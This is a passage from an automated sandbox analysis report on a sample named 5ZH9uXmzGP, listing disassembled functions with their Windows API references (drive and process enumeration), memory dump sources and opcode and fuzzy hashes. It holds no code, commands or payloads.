                                                            • Opcode ID: df784e1b7cb89c2462cec44a1b330cb9220bf6884c4fbfb49ee60f11268ff459
                                                            • Instruction ID: a6e6020610bc0437be3f3f183904d2a188d147f79af66c96c89d287955ba36ec
                                                            • Opcode Fuzzy Hash: df784e1b7cb89c2462cec44a1b330cb9220bf6884c4fbfb49ee60f11268ff459
                                                            • Instruction Fuzzy Hash: 79A102EB58D133BEB3C2C5856B54AF7A76EE2D67303308426F407D6602EA944E894DF1
                                                            Function 06EF018A Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 316COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 3d4d8b34bd9e7df089e520e7f4eb9663f599f8a652f4e2e1425390e5953b5073
                                                            • Instruction ID: ff4d1475ba9e72f0ca656257b8e62196a3bf2a6dcb0f8ee112dd54202d54ebea
                                                            • Opcode Fuzzy Hash: 3d4d8b34bd9e7df089e520e7f4eb9663f599f8a652f4e2e1425390e5953b5073
                                                            • Instruction Fuzzy Hash: 3261C5EB52D324AF73C287855B74AFA6B5EE6D6730331A426F607D2503E2E50B4A01F1
                                                            Function 06EF029D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: ee0ea27bd477756443a7da774144f60cdb106f8767959342276e179838220e32
                                                            • Instruction ID: e1afcc175e659db7b5d5d20cd8003d516ea6a07bf2e812395aa317a540ff04a9
                                                            • Opcode Fuzzy Hash: ee0ea27bd477756443a7da774144f60cdb106f8767959342276e179838220e32
                                                            • Instruction Fuzzy Hash: 455149E752D311AFB7C2C7915B74AFA2B6DDAD6730331A026FA07C7103E2A44A4641F1
                                                            Function 06EF028F Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 463f7e55c284cf9aee49fee2d045e388ebaa878978a997ee0ab6fd47bd941736
                                                            • Instruction ID: 7c681ac823bea5ea9f35078a2260bb8481f810b628a5f900c2eb083164c68945
                                                            • Opcode Fuzzy Hash: 463f7e55c284cf9aee49fee2d045e388ebaa878978a997ee0ab6fd47bd941736
                                                            • Instruction Fuzzy Hash: 5951F4E752D315AF73C283855B74AFA676EE6D67703309426FA07D2603E6E40A8A01F1
                                                            Function 06EF02E2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: eb3d519719ab641f07be2ac73b6f32f0b5e08f1f92ce91fb7e554d85df66cdc9
                                                            • Instruction ID: 7b7c3980a9a53fea67c81291b05783e7cd66dede6cc2fb1e068af5d06e7f91e4
                                                            • Opcode Fuzzy Hash: eb3d519719ab641f07be2ac73b6f32f0b5e08f1f92ce91fb7e554d85df66cdc9
                                                            • Instruction Fuzzy Hash: 6E4105F712D311AFB3C287915B74AFA6B5EDAD67303319026FA07C2603E6E40A4A01F1
                                                            Function 06EF0304 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 5ba3a1d46be5f44fea4b98157febb13eb8cb7c051ae6af61f4d0ceb45f649c4d
                                                            • Instruction ID: 7f7e7e9bcf1de5e32421bc112a1fba4716d747af68d949e374e4ecd0a0d45db2
                                                            • Opcode Fuzzy Hash: 5ba3a1d46be5f44fea4b98157febb13eb8cb7c051ae6af61f4d0ceb45f649c4d
                                                            • Instruction Fuzzy Hash: 344104E752D321AFB3C283951B74AFA6B5EDAD67303309466F607C3603E2A40A4A01B1
                                                            Function 06EF03E2 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 739de2cc2be504e740391f83085a0c79de0d82ca0f4db6b6638abf17153f845c
                                                            • Instruction ID: 9816abb2fd55ba9428b1b55b0a58b406b6542436aa8532f09975caa5658fd239
                                                            • Opcode Fuzzy Hash: 739de2cc2be504e740391f83085a0c79de0d82ca0f4db6b6638abf17153f845c
                                                            • Instruction Fuzzy Hash: 4E415AE713D311AFB7C283511B74AFA2B6EDAD6330330A066F607C2603E2D40A8641F1
                                                            Function 06EF0316 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 0af7056d9e723bf04ff064ecfbc30d2077b04c88b076db3fb51579b20266447b
                                                            • Instruction ID: 9f8b8ce76bac554e9ce6a8989c409e82cedb94e9ca73eda96fab9711e10092cf
                                                            • Opcode Fuzzy Hash: 0af7056d9e723bf04ff064ecfbc30d2077b04c88b076db3fb51579b20266447b
                                                            • Instruction Fuzzy Hash: 4D4127E752D315AFB3C2C3911B74AFA275EDAD67703309026F607D2603E6E40A4A01F1
                                                            Function 06EF0340 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: d2a76f20a09504fdb4ffee64566a05a2c9ef63463713dc4772ef07333a71c04d
                                                            • Instruction ID: 23ab4dafd88c7df2da7369ad5e8dc9f8a08125456a489fdb59cd7badca1f0dd3
                                                            • Opcode Fuzzy Hash: d2a76f20a09504fdb4ffee64566a05a2c9ef63463713dc4772ef07333a71c04d
                                                            • Instruction Fuzzy Hash: DF4107E752D311AFB3C283951B74AFA675EDAD67303309066B607D2603E6E40A4601F1
                                                            Function 06EF032E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 589e4665349f474dc738ea27e63e8788eb7356c7f5dd2fe5df563c575806c3ee
                                                            • Instruction ID: 5cfc7548ce94918d9f98a75496870cfe6879cfab3b70af2bb6e948ef6dee7db2
                                                            • Opcode Fuzzy Hash: 589e4665349f474dc738ea27e63e8788eb7356c7f5dd2fe5df563c575806c3ee
                                                            • Instruction Fuzzy Hash: 7B4104E752C321AFB3C283951B74AFA6B5EDAD67703319066B607D3603E6E40A4601F1
                                                            Function 06EF03C5 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 200COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: ab09f4a959849bede4d67c6293c80d9bb8b3296d659b26a6fe1752f6ae80a900
                                                            • Instruction ID: 7e6b15a649b96b0a5b5a50b7dbde2e6f92227463880c6f4565761c7627284158
                                                            • Opcode Fuzzy Hash: ab09f4a959849bede4d67c6293c80d9bb8b3296d659b26a6fe1752f6ae80a900
                                                            • Instruction Fuzzy Hash: E14136A753D321AFB7C283911B74AFA675EDAD6770331A066FA07C7603E2D40A8601F1
                                                            Function 06EF035F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 87ef1b1c1ab10166fafef6f0c46af3c2b2df73be1a52969a5c0a45d1ddcd420e
                                                            • Instruction ID: 768cb9ba7c3fd012d90dcf1e1892dd3e78606fcc63679eb443ca2d73459eeb38
                                                            • Opcode Fuzzy Hash: 87ef1b1c1ab10166fafef6f0c46af3c2b2df73be1a52969a5c0a45d1ddcd420e
                                                            • Instruction Fuzzy Hash: 014135E752C321AFB3D283951B74AFA675EDAE6770331A066FA07D7603E2D40A4601F1
                                                            Function 06EF0392 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 192COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: ef5d5726cb2d1ec77287eb93270e8fe227331d2b64feba1fc4f0fb1d55d4df96
                                                            • Instruction ID: 00ccdbb562966774eefe28e6f0c5681d3ef4fbd68a2a975ca6e3166915abd577
                                                            • Opcode Fuzzy Hash: ef5d5726cb2d1ec77287eb93270e8fe227331d2b64feba1fc4f0fb1d55d4df96
                                                            • Instruction Fuzzy Hash: 564114E752C321AFB3C283511B74AFA675EDAD66303319066FA07C2603E6D40E4641F2
                                                            Function 06EF03A4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 2a906dd97201fbe87690dfa49a3c8c125cd37aeddaa7ee09683125730bc48888
                                                            • Instruction ID: 064b6f103bf6fdc919b763fc0d5cf25cc0845023670aacde1c14f1f886aa5d0f
                                                            • Opcode Fuzzy Hash: 2a906dd97201fbe87690dfa49a3c8c125cd37aeddaa7ee09683125730bc48888
                                                            • Instruction Fuzzy Hash: DC41D4E752C321AF73D283951B70AFA675EDAD67703319466BA07D3603E6D40A4601F1
                                                            Function 06EF03B3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 181COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: c46d229bf1bb8deb2d4477f9c88b1f3301143e503bb32cbb889300ede9bd2f83
                                                            • Instruction ID: ce34fa4f231e5f21e32abb49cd12416d28533718d39d75fda08fb520c6d92411
                                                            • Opcode Fuzzy Hash: c46d229bf1bb8deb2d4477f9c88b1f3301143e503bb32cbb889300ede9bd2f83
                                                            • Instruction Fuzzy Hash: EE31F5E712C311AF73D283551B70AFA275EDAD6770331A466BA07C3603E6D40E8641F2
                                                            Function 06EF0410 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 172COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: f35e364ded09ef1f754c2c751c5a4a8c0509a50b14fd667ceb76963a76e971f6
                                                            • Instruction ID: a4a719c92a1144a8c08eac237992ae01ca02b2100bfd53918ca696b0db9f3329
                                                            • Opcode Fuzzy Hash: f35e364ded09ef1f754c2c751c5a4a8c0509a50b14fd667ceb76963a76e971f6
                                                            • Instruction Fuzzy Hash: 963115F712C321AFB392C2551B70AFA676DD9D6770331947AFA07C3643E2940A8641B2
                                                            Function 06EF0438 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06EF0443
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416599481.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6ef0000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\
                                                            • API String ID: 999431828-3379428675
                                                            • Opcode ID: 2f5a5f4f6d3c1f0f7e31417d752d94435fc5c8c9efa454dcb0fa4277ade890bf
                                                            • Instruction ID: fa9ac2668d3ad162fdf779c3de8c2f59e75cd1e15fd7897325d3cef8deeb98e0
                                                            • Opcode Fuzzy Hash: 2f5a5f4f6d3c1f0f7e31417d752d94435fc5c8c9efa454dcb0fa4277ade890bf
                                                            • Instruction Fuzzy Hash: A73113E712C321AFB39282551B70AFA279ED9D6770331946ABA07C3603E2944A8641B2
                                                            Function 06F30063 Relevance: 1.9, APIs: 1, Instructions: 358COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: ca192912b37fdb29299a5a282ebc7ae5e7046e158f59f2b8286599e50ae0e4c7
                                                            • Instruction ID: b5e08f5966381325268f28ad7b08a73624a2914052a667ca570e57a7188eda9a
                                                            • Opcode Fuzzy Hash: ca192912b37fdb29299a5a282ebc7ae5e7046e158f59f2b8286599e50ae0e4c7
                                                            • Instruction Fuzzy Hash: 4C51E5FB24D131BDB28281866F24EFB676EE1D6770731C42BF807D6542EA984B4E11B1
                                                            Function 06F30092 Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f3b914749b627678155608305b6281d7563a0fcfe3fe6b9eff9df3479677ae8
                                                            • Instruction ID: 3ed95a8d24468dce8004117f96a0ab3944116b2ce4385976edd3f0c416dcf9e3
                                                            • Opcode Fuzzy Hash: 1f3b914749b627678155608305b6281d7563a0fcfe3fe6b9eff9df3479677ae8
                                                            • Instruction Fuzzy Hash: A65126FB24D131BDB28280416F64EFB672EE1D6730730C42BF807D6542EA944B4E11B1
                                                            Function 06F300BB Relevance: 1.8, APIs: 1, Instructions: 319COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: fe44b85ab3afa5c55f7e51b3b801e1791aefdeabb796486ee49298ad6981c230
                                                            • Instruction ID: 5180e5c83bb9fb58cec94d511a09f2394a5dfcd67d18c043e702c4080b56e89a
                                                            • Opcode Fuzzy Hash: fe44b85ab3afa5c55f7e51b3b801e1791aefdeabb796486ee49298ad6981c230
                                                            • Instruction Fuzzy Hash: AD5106FB24C131BDB28281826F24EFB676EE1D6770731C42BF807D2542EA984B4E11B1
                                                            Function 06F300DB Relevance: 1.8, APIs: 1, Instructions: 317COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 2e98f73e83f7cf311705e697413b0bf05f1d044504da4e843c3f70b2c0e33d5f
                                                            • Instruction ID: e7b5d08b2c0b7c9ee466767a0f61b52f29d3aba7aae8e8b77d6de3ccce3e987e
                                                            • Opcode Fuzzy Hash: 2e98f73e83f7cf311705e697413b0bf05f1d044504da4e843c3f70b2c0e33d5f
                                                            • Instruction Fuzzy Hash: 865105FB24D131BDB28280426F68EFB676EE1D6770731C42BF807D2542EA984B4E11B1
                                                            Function 06F30177 Relevance: 1.8, APIs: 1, Instructions: 301COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 001dc58e34585aa4a651e5b04802b403abe6f7e49d00fd46aa2f7e8e06525d20
                                                            • Instruction ID: f5a7c1b81bfa92b633acb4937c0b17446391dfc5b2da11661cdce62c70799344
                                                            • Opcode Fuzzy Hash: 001dc58e34585aa4a651e5b04802b403abe6f7e49d00fd46aa2f7e8e06525d20
                                                            • Instruction Fuzzy Hash: 755107FB24D131BDB28290416F64EFB672EE1D6B70731C42BF807D6542EA984B4E11B1
                                                            Function 06F3010F Relevance: 1.8, APIs: 1, Instructions: 298COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 715f111eb69325e6e4b46c24d1abdfe4dbb6285efc3a1d98a51c25365b41b2c8
                                                            • Instruction ID: 99139e8ea9f6172557b54b2e90666b36b54d4c78c11bce2b69639b3033e774da
                                                            • Opcode Fuzzy Hash: 715f111eb69325e6e4b46c24d1abdfe4dbb6285efc3a1d98a51c25365b41b2c8
                                                            • Instruction Fuzzy Hash: 235107EB24D131BDB28291416F64EFB572EE1D6770731C42BF807D2542EAD44B4E51B1
                                                            Function 06F30106 Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: be9941078e745ac4b2268baa8db5edb0a313070fbff131bfed3596ba56b8de1d
                                                            • Instruction ID: 52454f27375dacb09428b2152899144bd0f0c2408cb8545d24a2196040f68258
                                                            • Opcode Fuzzy Hash: be9941078e745ac4b2268baa8db5edb0a313070fbff131bfed3596ba56b8de1d
                                                            • Instruction Fuzzy Hash: EC5105FB24D131BDB28280416F68EFB672EE1D6770731C42BF807D2542EA984B4E11B1
                                                            Function 06F3012E Relevance: 1.8, APIs: 1, Instructions: 288COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 547435d43358c32bbba4e4d3c81ef183a0d5bfa1efbdf2bff22b2c0c258c7390
                                                            • Instruction ID: 288c6a66f54ae22eba2938730b2204cf1e28e5170271cc59999d38433bce6a13
                                                            • Opcode Fuzzy Hash: 547435d43358c32bbba4e4d3c81ef183a0d5bfa1efbdf2bff22b2c0c258c7390
                                                            • Instruction Fuzzy Hash: 955128FB24D131BDB28281416F68EFB672EE1D6B30731C42BF807D2542EA984B4E51B1
                                                            Function 06F30146 Relevance: 1.8, APIs: 1, Instructions: 283COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0a4aa75d5dc6dc5a7333880b216537556b4df357224901c0c3306dde176eb546
                                                            • Instruction ID: 5cdfe7f51df68e890ecba99074d0a7b51aa82341cab997201e8870f4e363d4be
                                                            • Opcode Fuzzy Hash: 0a4aa75d5dc6dc5a7333880b216537556b4df357224901c0c3306dde176eb546
                                                            • Instruction Fuzzy Hash: 425117FB24D131BDB28280416F68EFB672EE1D6730731C42BF807D2542EA944B4E51B1
                                                            Function 06F301AF Relevance: 1.8, APIs: 1, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00aafebd25792503f67122dc3275adb2946835de5f54ef552f804c2b009dc1bb
                                                            • Instruction ID: f660d8f323655a8f58fd55cafbc7c1ac1830321c52754842a567f5a19c147f56
                                                            • Opcode Fuzzy Hash: 00aafebd25792503f67122dc3275adb2946835de5f54ef552f804c2b009dc1bb
                                                            • Instruction Fuzzy Hash: DF4137EB24D131BDB28290416F65EFB6B6EE1D6B70730C42BF807D6542EA884F4E51B1
                                                            Function 06F30195 Relevance: 1.8, APIs: 1, Instructions: 252COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2416671623.0000000006F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_6f30000_5ZH9uXmzGP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 05d85a3ae0ca7f1a7499cb548f8e7f0d4ba269bf4b3ce775e788b99d6db4a8a4
                                                            • Instruction ID: 9a750d3191c7e894477331d1a0fe5573b40f3243b7526d043b60b1b3da63470b
                                                            • Opcode Fuzzy Hash: 05d85a3ae0ca7f1a7499cb548f8e7f0d4ba269bf4b3ce775e788b99d6db4a8a4
                                                            • Instruction Fuzzy Hash: 0F4129EB24D131BDB28290426F64EFB676EE2D6730730C42BF807D2542EA984F4E51B1
                                                            Function 06F301C8 Relevance: 1.7, APIs: 1, Instructions: 240COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,?,?), ref: 06F30366
                                                            Memory Dump Source
